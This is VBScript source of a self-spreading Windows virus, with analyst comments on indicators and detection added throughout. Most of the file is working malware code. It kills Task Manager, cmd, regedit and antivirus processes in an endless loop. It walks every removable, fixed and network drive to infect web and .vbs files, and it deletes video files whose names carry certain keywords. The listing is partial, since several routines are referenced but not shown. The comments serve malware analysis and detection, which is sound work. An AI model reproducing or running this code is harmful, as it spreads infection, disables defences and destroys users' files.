📄 virus.vbs
'jk4
'WNXCBDYNEYIEB1_5
' MonitorSystem: endless watchdog loop. Every 5 seconds it calls KillProcess on
' a fixed list of process names and then InvadeSystem(objfso, vbsCode).
' InvadeSystem is not defined in this listing; by its name it presumably
' re-installs the script (confirm against the full sample).
' Analyst note: the list names Task Manager, cmd, regedit, msconfig and
' security tools (360tray, SREng, USBAntiVir), so those programs closing
' moments after launch is a visible symptom on an affected host.
Sub MonitorSystem(objfso, vbsCode)
' Errors are suppressed, so a failed call never breaks out of the loop.
On Error Resume Next
Dim ProcessNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
' No exit condition: the loop runs for as long as the script host process lives.
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(objfso, vbsCode)
WScript.Sleep 5000
Loop
End Sub
'ZHISYBKQRKB1_5
'WNXCBDYNEYIEB2_19
' GetVersion: reads the whole file at path_v and returns the single character
' that immediately follows the first occurrence of the global Head_V marker.
' The builders in this listing write Head_V & Version, so that character is
' the version stamp of the copy stored in the file.
' If the marker is absent InStr returns 0, and the result is simply the
' character at offset Len(Head_V) of the file.
Function GetVersion(objfso, path_v)
Dim FV, buffer
' iomode 1 = ForReading.
Set FV = objfso.OpenTextFile(path_v, 1)
buffer = FV.ReadAll()
GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
End Function
' GetScriptCode: for use when the code is hosted in a web page or HTA. Walks
' document.Scripts and returns the Text of the first script element whose
' lower-cased Language attribute equals the Languages argument.
' Only "vbscript" and "javascript" are handled; both branches do the same thing.
' The argument is compared against LCase(...), so it must be passed in lower case.
' Returns Empty when nothing matches or when document is unavailable
' (errors are suppressed).
Function GetScriptCode(Languages)
On Error Resume Next
Dim soj
For Each soj In document.Scripts
If LCase(soj.Language) = Languages Then
Select Case LCase(soj.Language)
Case "vbscript"
GetScriptCode = soj.Text
Exit Function
Case "javascript"
GetScriptCode = soj.Text
Exit Function
End Select
End If
Next
End Function
' GetSelfCode: reads the file at FullPath_Self and returns the span that starts
' at the first Head_V marker and runs through the last Tail_V marker (plus one
' trailing character). Anything outside the two markers, i.e. the host file's
' own content, is dropped.
' Analyst note: Head_V and Tail_V delimit the embedded body in every carrier
' file, so they are the natural strings to search for when scoping or cleaning.
' Their values come from GetHeadTail, which is not part of this listing.
Function GetSelfCode(objfso, FullPath_Self)
On Error Resume Next
Dim n, n1, buffer, Self
' iomode 1 = ForReading.
Set Self = objfso.OpenTextFile(FullPath_Self, 1)
buffer = Self.ReadAll
' First head marker and last tail marker bound the extracted span.
n = InStr(buffer, Head_V)
n1 = InstrRev(buffer, Tail_V)
buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
GetSelfCode = buffer
Self.Close
End Function
' GetMainBody: concatenates modules 2..Sum_ModelCode of vbsCode, each wrapped
' in CRLF. Modules are fetched with GetModelCode, which is not defined in this
' listing. Module 1 is skipped here; the callers in this listing emit
' VirusHead() in front of this result instead.
Function GetMainBody(vbsCode, Sum_ModelCode)
Dim i
For i = 2 To Sum_ModelCode
GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
Next
End Function
'ZHISYBKQRKB2_19
'WNXCBDYNEYIEB1_8
' RestoreSystem: the sample's own uninstall routine. It undoes registry and
' file changes and therefore doubles as a checklist of where to look on an
' affected host:
'   - HKCU ...\Windows NT\CurrentVersion\Windows\Load (a logon autostart value)
'   - the shell\open\command handlers for txtfile, regfile, chm.file, hlpfile
'     and exefile under HKLM\SOFTWARE\Classes
'   - <drive>:\<Name_V1> together with <drive>:\AutoRun.inf on every drive
'   - FullPath_V0, FullPath_V1 and FullPath_Config
' NOTE(review): the install side is not in this listing; that it hijacks
' exactly these locations is inferred from what is restored here.
' ReadReg, WriteReg, DeleteReg and SafeSet are defined elsewhere.
Sub RestoreSystem(objfso)
On Error Resume Next
Dim Value, dc, d, HCULoad
Call SafeSet()
' Remove the autostart value only when it points at this sample's own copy.
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
If ReadReg(HCULoad) = FullPath_V1 Then
Call DeleteReg(HCULoad)
End If
' Each handler below is rewritten only if it differs from the value set here.
' .txt -> Notepad
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
' .reg -> regedit
Value = "regedit.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
' .chm -> hh.exe, path built from GetSFolder(1)
Value = GetSFolder(1) & "hh.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
' .hlp -> winhlp32
Value = "%SystemRoot%\system32\winhlp32.exe %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
' .exe -> run the program itself with its arguments
Value = """%1"" %*"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
End If
' Drive roots: AutoRun.inf is deleted only where the script copy is also present.
Set dc = objfso.Drives
For Each d In dc
If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
End If
Next
' Installed copies and the config file (paths are set in the top-level code).
If objfso.FileExists(FullPath_V1) = True Then
Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
End If
If objfso.FileExists(FullPath_V0) = true Then
Set vf = objfso.GetFile(FullPath_V0)
vf.Delete
End If
If objfso.FileExists(FullPath_Config) = True Then
objfso.DeleteFile FullPath_Config , True
End If
End Sub
'ZHISYBKQRKB1_8
'WNXCBDYNEYIEB2_11
' SearchFile: recursive walk of strPath. For each file, by extension:
'   hta / htm / html / asp / vbs -> handed to InfectHead (not in this listing)
'   mpg / rmvb / avi / rm        -> deleted when IsSexFile(name) is True
' The walk stops once the global counter Cnt reaches CntMax. Cnt is not
' changed in this routine; presumably InfectHead increments it (confirm).
' Analyst note: the first extension list is the set of file types to scan for
' the Head_V marker when scoping; the second branch is destructive, so
' matching video files are lost rather than modified.
Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
' Access-denied folders and locked files are skipped silently.
On Error Resume Next
Dim pfo, pf, pfi, ext
Dim psfo, ps
Set pfo = objfso.GetFolder(strPath)
Set pf = pfo.Files
For Each pfi In pf
If Cnt >= CntMax Then
Exit For
End If
ext = LCase(objfso.GetExtensionName(pfi.Path))
Select Case ext
Case "hta", "htm", "html", "asp", "vbs"
Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
Case "mpg", "rmvb", "avi", "rm"
If IsSexFile(pfi.Name) = True Then
pfi.Delete
End If
End Select
Next
' Descend into subfolders under the same Cnt / CntMax limit.
Set psfo = pfo.SubFolders
For Each ps In psfo
If Cnt >= CntMax Then
Exit For
End If
Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
Next
End Sub
'ZHISYBKQRKB2_11
'WNXCBDYNEYIEB2_10
' SearchDrives: calls SearchFile on the root of every drive whose DriveType is
' 1, 2 or 3 (FileSystemObject: removable, fixed, network), stopping once the
' global Cnt reaches CntMax.
' Analyst note: type 3 covers mapped network drives, so shares reachable from
' an affected host belong in the scope of a cleanup, as do USB media (type 1).
Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim d , dc
Set dc = objfso.Drives
For Each d In dc
If Cnt >= CntMax Then '
Exit For
End If
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
' The two commented-out lines are an earlier removable-only condition left by the author.
'If d.DriveType = 1 Then
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
'End If
End If
Next
End Sub
'ZHISYBKQRKB2_10
'WNXCBDYNEYIEB2_21
' IsSexFile: returns True when fname contains any of nine hard-coded Chinese
' adult-content keywords, otherwise False. InStr is called without a compare
' argument, so this is an exact substring match.
' The only caller in this listing is SearchFile, which deletes matching video files.
Function IsSexFile(fname)
IsSexFile = False
If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
IsSexFile = True
End If
End Function
' Isinfected: infection-marker test. For hta / htm / html / asp / vbs content
' it returns False only when the Head_V marker does not occur in buffer; for
' every other type it returns True.
' Analyst note: the sample itself relies on Head_V to recognise its copies,
' which makes that string the most direct content indicator for scanning
' files of these types. Its value comes from GetHeadTail(0), not shown here.
Function Isinfected(buffer, ftype)
' Default is "already infected"; only a missing marker flips it.
Isinfected = True
Select Case ftype
Case "hta", "htm" , "html" , "asp", "vbs"
If InStr(buffer, Head_V) = 0 Then
Isinfected = False
End If
Case Else
Isinfected = True
End Select
End Function
'ZHISYBKQRKB2_21
'WNXCBDYNEYIEB2_24
' KillProcess: for each name in ProcessNames, queries Win32_Process over WMI
' (root\cimv2 on the local machine) and calls Terminate on every match.
' When Terminate returns 2 (access denied) it falls back to running
' "cmd.exe /c @tskill <name without the 4-character extension>" in a hidden
' window (window style 0) without waiting for it to finish.
' Detection note: a script host (wscript / cscript / mshta) that terminates
' processes through WMI, or that spawns cmd.exe with tskill against security
' or administration tools, is a strong behavioural signal for this family.
Sub KillProcess(ProcessNames)
On Error Resume Next
Dim objShell, intReturn, name_exe
Set objShell = WScript.CreateObject("WScript.Shell")
strComputer = "."
Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
For Each ProcessName in ProcessNames
' The name is concatenated into the WQL text; in this listing it only ever
' comes from the hard-coded array in MonitorSystem.
Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
For Each objProcess in colProcessList
intReturn = objProcess.Terminate
Select Case intReturn
' 2 = access denied
Case 2
name_exe = objProcess.Name
name_exe = Left(name_exe, Len(name_exe) -4)
objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
End Select
Next
Next
Set objShell = Nothing
End Sub
'ZHISYBKQRKB2_24
'WNXCBDYNEYIEB1_2
' ExeVbs_WebPage: entry path for a copy hosted in a web page or HTA.
' It takes the VBScript text from the page's script elements, rebuilds a
' complete body as
'   Head_V & Version, VirusHead(), modules 2..Sum_ModelCode, Tail_V
' passes it through ChangeModelOrder and hands the result to InvadeSystem.
' VirusHead, ChangeModelOrder and InvadeSystem are not in this listing.
' NOTE(review): ChangeModelOrder presumably shuffles module order, in which
' case copies differ byte-for-byte and the fixed marker strings are a more
' stable match than a whole-file hash; confirm against the full sample.
Sub ExeVbs_WebPage()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
' The FileSystemObject ProgID comes from GetFSOName() rather than a literal.
Set objfso = CreateObject(GetFSOName())
vbsCode = GetScriptCode("vbscript")
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Set objfso = Nothing
End Sub
' ExeVbs_Victim: entry path for a copy embedded in a .vbs file run by the
' script host. It extracts the marked body from its own file
' (WScript.ScriptFullName), rebuilds and reorders it the same way as
' ExeVbs_WebPage, calls InvadeSystem, and then launches the installed copy at
' FullPath_V1 through Run (defined elsewhere).
' Detection note: a user-opened .vbs that ends up starting a second script
' from the System folder named <username>.vbs matches this path.
Sub ExeVbs_Victim()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Set objfso = Nothing
End Sub
'ZHISYBKQRKB1_2
'WNXCBDYNEYIEB1_1
' Top-level initialisation: globals shared by every module, then the entry call.
' File-system indicators derived here (GetSpecialFolder 0 = Windows folder,
' 1 = System folder):
'   <Windows folder>\<username>.vbs   (FullPath_V0)
'   <System folder>\<username>.vbs    (FullPath_V1)
'   <System folder>\<username>.ini    (FullPath_Config)
' where <username> is whatever GetUserName() returns ("Administrator" as fallback).
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
' Cnt / CntMax bound the file walk in SearchFile and SearchDrives.
Cnt = 0
CntMax = 1000
Version = "4"
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 'mainly handles the file-association redirect
FullPath_V1 = GetSFolder(1) & Name_V1 'mainly executes the config-file commands
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
' Number of marker-delimited modules the body is split into.
Sum_ModelCode = 26
' Start and end markers of the whole embedded body; GetHeadTail is not in this listing.
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
' Prefixes of the per-module marker comments that appear throughout this file.
ModelHead="'WNXCBDYNEYIEB"
ModelTail="'ZHISYBKQRKB"
Call VirusMain()
' VirusMain: entry point called from the top-level code; it only dispatches to
' ExeVbs_Virus. That routine is not defined in this listing (which holds
' ExeVbs_WebPage and ExeVbs_Victim), so this copy is presumably the installed
' variant with its own head module; confirm against the full sample.
Sub VirusMain()
On Error Resume Next
Call ExeVbs_Virus()
End Sub
'ZHISYBKQRKB1_1
'WNXCBDYNEYIEB2_23
' MakeScript: wraps strCode in an HTML VBScript script element for embedding
' in web-type files. With T = 1 the code is first passed through
' ChangeModelOrder (defined elsewhere); otherwise it is embedded as given.
' The opening and closing tags are assembled from "<" & "SCRIPT..." pieces,
' presumably so the literal tag text never appears inside the carrier's own
' script element. A content search for the tag as one literal string will
' therefore not match this source, whereas the marker strings will.
Function MakeScript(strCode, T)
If T = 1 Then
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
Else
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
End If
End Function
'ZHISYBKQRKB2_23
'WNXCBDYNEYIEB2_22
' GetSFolder: returns the FileSystemObject special folder p with a trailing
' backslash (0 = Windows folder, 1 = System folder, 2 = Temp folder).
' The object is created from the ProgID returned by GetFSOName() rather than
' from a literal string in the source.
Function GetSFolder(p)
Dim objfso
Set objfso = CreateObject(GetFSOName())
GetSFolder = objfso.GetSpecialFolder(p) & "\"
Set objfso = Nothing
End Function
' GetUserName: returns the Username value stored under the HKCU Active Setup
' component key below, or "Administrator" when it is empty or unreadable
' (errors are suppressed, so a failed read leaves UserName empty).
' The result becomes the base name of the dropped .vbs and .ini files, so
' their names vary per account instead of being fixed strings.
Function GetUserName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Administrator"
Else
GetUserName = UserName
End If
End Function
Function GetFSOName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)